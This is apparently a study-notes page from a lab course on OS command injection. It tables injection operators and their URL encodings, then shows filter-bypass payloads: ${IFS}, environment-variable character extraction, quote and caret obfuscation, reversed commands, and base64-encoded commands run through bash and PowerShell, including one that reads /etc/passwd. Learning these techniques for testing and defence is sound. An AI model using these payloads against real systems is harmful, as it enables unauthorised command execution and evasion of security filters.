☑️Exploitation

Operators

Lets say that we have a function that takes our commands and executes it. For example, a web app that takes an IP address that we would like to ping. The IP address is used directly as the input for the ping command.

To inject additional commands we need to add an operator and here is a list:

Injection Operator

Injection Character

URL-Encoded Character

Executed Command

Semicolon

;

%3b

Both

New Line (no need to chain if we have it)

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

|

%7c

Both (only second output is shown)

AND

&&

%26%26

Both (only if first succeeds)

||

%7c%7c

Second (only if first fails)

Sub-Shell

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)

And now lets look at this list where we have the injection types and the operators used in that injection:

Injection Type

Operators

SQL Injection

' , ; -- /* */

Command Injection

; &&

LDAP Injection

* ( ) & |

XPath Injection

' or and not substring concat count

OS Command Injection

; & |

Code Injection

' ; -- /* */ $() ${} #{} %{} ^

Directory Traversal/File Path Traversal

../ ..\\ %00

Object Injection

; & |

XQuery Injection

' ; -- /* */

Shellcode Injection

\x \u %u %n

Header Injection

\r %0d %0a %09

Filters

This web application has filters and detection at the back-end. We see that it says 'Invalid input' on the same page.

If the error message displayed a different page, with information like our IP and our request, this may indicate that it was denied by a WAF.

In the following command:

127.0.0.1; whoami

We have added three things. A ; character, a space character, and the command whoami. Either the characters or the command here is blacklisted.

Bypassing Filters

Space Filter

Using tab character (%09)

Using Linux env variable ${IFS} which has a default value of a space and a tab.

Using Bash Brace Expansion feature which adds spaces between arguments wrapped in braces. For example:

{ls,-la}

Here is a list of more filter bypass characters in PayloadsAllTheThings Github repo.

Slash

Using Linux env variable ${PATH} which has the value of different paths and it containts the character \. For example, for a value of /usr/local/bin:/usr/bin:/bin:/usr/games we can take out the / with ${PATH:0:1}. We can do the same with the $HOME or $PWD environment variables as well.

${PATH:0:1}

We can do the same on Windows with

%HOMEPATH:~6,-11%

And PowerShell:

$env:HOMEPATH[0]

Semi-colon

We can get a semicolor on Linux with:

${LS_COLORS:10:1}

We can also use the Get-ChildItem Env: PowerShell command to print all environment variables and then pick one of them to produce a character we need.

Pipe

$(tr${IFS}'!-}'${IFS}'"-~'<<<{)

Character Shifting

There are other techniques to produce the required characters without using them, like shifting characters. For example, the following Linux command shifts the character we pass by 1. So, all we have to do is find the character in the ASCII table that is just before our needed character (we can get it with man ascii), then add it instead of [ in the below example. This way, the last printed character would be the one we need:

anonmak9@htb[/htb]$ man ascii     # \ is on 92, before it is [ on 91
anonmak9@htb[/htb]$ echo $(tr '!-}' '"-~'<<<[)

\

We can use PowerShell commands to achieve the same result in Windows, though they can be quite longer than the Linux ones.

Blacklisted Commands

Lets use the command 'whoami' as our example. It has been blacklisted.

There are some characters that are ignored by Bash and PowerShell such as ' and ". So the following command will work!

w'ho'am'i

Linux Only

We can insert a few other Linux-only characters in the middle of commands, and the bash shell would ignore them and execute the command. These characters include the backslash \ and the positional parameter character $@.

who$@ami
w\ho\am\i

Windows Only

There are also some Windows-only characters we can insert in the middle of commands that do not affect the outcome, like a caret (^) character, as we can see in the following example:

who^ami

More Command Obfuscation

Case Manipulation

Instead of 'whoami' we can type 'whOami'.

However, Linux and Bash shells are case-sensitive. So we have to get creative. We can use the following command:

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Reversed Command

We will be writing imaohw instead of whoami to avoid triggering the blacklisted command.

$(rev<<<'imaohw')

Same thing can be done on Windows PowerShell. The PS subshell with IEX

iex "$('imaohw'[-1..-20] -join '')"

Encoded Commands

We can utilize various encoding tools, like base64 (for b64 encoding) or xxd (for hex encoding). Let's take base64 as an example. First, we'll encode the payload we want to execute (which includes filtered characters):

anonmak9@htb[/htb]$ echo -n 'cat /etc/passwd | grep 33' | base64

Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==

Now we can create a command that will decode the encoded string in a sub-shell ($()), and then pass it to bash to be executed (i.e. bash<<<), as follows:

anonmak9@htb[/htb]$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

We use the same technique with Windows as well. First, we need to base64 encode our string, as follows:

PS C:\htb> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

dwBoAG8AYQBtAGkA

We may also achieve the same thing on Linux, but we would have to convert the string from utf-8 to utf-16 before we base64 it, as follows:

anonmak9@htb[/htb]$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64

dwBoAG8AYQBtAGkA

Finally, we can decode the b64 string and execute it with a PowerShell sub-shell (iex "$()"), as follows:

PS C:\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

anonmak9

PreviousIntroduction NextEvasion Tools

Last updated 11 months ago